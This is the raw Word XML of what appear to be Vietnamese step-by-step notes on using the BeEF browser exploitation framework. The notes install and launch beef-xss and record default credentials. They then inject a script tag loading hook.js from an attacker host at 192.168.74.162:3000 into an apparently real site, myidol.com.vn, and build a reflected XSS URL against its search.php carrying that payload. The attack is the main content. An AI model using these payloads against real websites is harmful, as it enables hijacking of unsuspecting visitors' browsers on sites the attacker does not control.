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D64E" w14:textId="5819A533" w:rsidR="00345DF0" w:rsidRDefault="00E55A05">
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00CF54CA">
        <w:t>pt-get install beef-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CF54CA">
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2D922F2D" w14:textId="05BC0F4E" w:rsidR="00E55A05" w:rsidRDefault="00E55A05">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chạy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1AA3E7C0" w14:textId="1201BB7E" w:rsidR="00E55A05" w:rsidRDefault="00E55A05">
      <w:r w:rsidRPr="00E55A05">
        <w:t>beef-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E55A05">
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="67827FE7" w14:textId="2592698A" w:rsidR="00E55A05" w:rsidRDefault="00E55A05">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1481A518" wp14:editId="46A43BAE">
            <wp:extent cx="5243014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991D" w14:textId="254F386E" w:rsidR="00E55A05" w:rsidRDefault="00E55A05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pass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beef   123456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3489E8" w14:textId="3DB43A47" w:rsidR="00E55A05" w:rsidRDefault="00E55A05">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="462C9759" wp14:editId="070E87D0">
            <wp:extent cx="5281118" cy="3391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9CD" w14:textId="24B0CC16" w:rsidR="00CF54CA" w:rsidRDefault="00CF54CA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Vào</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> web myidol.com.vn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7358C90A" w14:textId="12F6B48A" w:rsidR="00CF54CA" w:rsidRDefault="00CF54CA">
      <w:r w:rsidRPr="00CF54CA">
        <w:t xml:space="preserve">&lt;script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF54CA">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF54CA">
        <w:t>="http://192.168.74.162:3000/hook.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D78C037" w14:textId="0963095D" w:rsidR="00CF54CA" w:rsidRDefault="00CF54CA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0608690D" wp14:editId="668EA529">
            <wp:extent cx="4442845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E4BD" w14:textId="486DE435" w:rsidR="00CF54CA" w:rsidRDefault="00CF54CA"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của beef</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD8908F" w14:textId="4A49F89D" w:rsidR="00CF54CA" w:rsidRDefault="00CF54CA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56E0DAA2" wp14:editId="7A3E7CE3">
            <wp:extent cx="5943600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8B76" w14:textId="2FDAB863" w:rsidR="00CF54CA" w:rsidRDefault="00CF54CA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D29FC6D" wp14:editId="65B36FF3">
            <wp:extent cx="5943600" cy="204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7226" w14:textId="16C6FE89" w:rsidR="00CF54CA" w:rsidRDefault="00CF54CA">
      <w:r>
        <w:t xml:space="preserve">Copy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kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1F8B0F" w14:textId="4453F868" w:rsidR="00CF54CA" w:rsidRDefault="00CF54CA">
      <w:r w:rsidRPr="00CF54CA">
        <w:t>cp /root/Desktop/abc.mp3 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF54CA">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF54CA">
        <w:t>/share/beef-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF54CA">
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF54CA">
        <w:t>/extensions/demos/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646D8CB7" w14:textId="22498C48" w:rsidR="00CF54CA" w:rsidRDefault="00CF54CA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A97677E" wp14:editId="08B6B71D">
            <wp:extent cx="5943600" cy="1954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301" w14:textId="6C9AFDB9" w:rsidR="00CF54CA" w:rsidRDefault="00577763">
      <w:r w:rsidRPr="00577763">
        <w:t>http://myidol.com.vn/home/search.php?q=%3Cscript+src%3D%22http%3A%2F%2F192.168.74.162%3A3000%2Fhook.js%22%3E%3C%2Fscript%3E</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00CF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7B"/>
    <w:rsid w:val="00345DF0"/>
    <w:rsid w:val="00577763"/>
    <w:rsid w:val="005F6C7B"/>
    <w:rsid w:val="00CF54CA"/>
    <w:rsid w:val="00E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360E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DBD9F6D6-EBC8-4BF0-BF70-C9ADCD9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A3DB0F3B7DF4EA87E9071408B0D6E" ma:contentTypeVersion="12" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="0d59c8b9a4869882f0a17e4d27bde702">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="b702ecc2-b28e-4466-8985-05390c27eb6b" xmlns:ns3="00d187dc-8039-4c02-83bd-0959fd86527f" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="1433c508db4dca68b9a007fa2b17bacb" ns2:_="" ns3:_="">
    <xsd:import namespace="b702ecc2-b28e-4466-8985-05390c27eb6b"/>
    <xsd:import namespace="00d187dc-8039-4c02-83bd-0959fd865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2ecc2-b28e-4466-8985-05390c27e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87dc-8039-4c02-83bd-0959fd865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DF960-1557-4BFA-B507-B69C3D6E5105}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{494C62FF-F082-4E13-AEAE-13F4798CEEBA}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{BB3FFA8C-C888-4A71-833C-DD3907BAF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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-01T04:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-04T11:09:00Z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0x010100C83A3DB0F3B7DF4EA87E9071408B0D6E</vt:lpwstr>
  </property>
</Properties>
</file>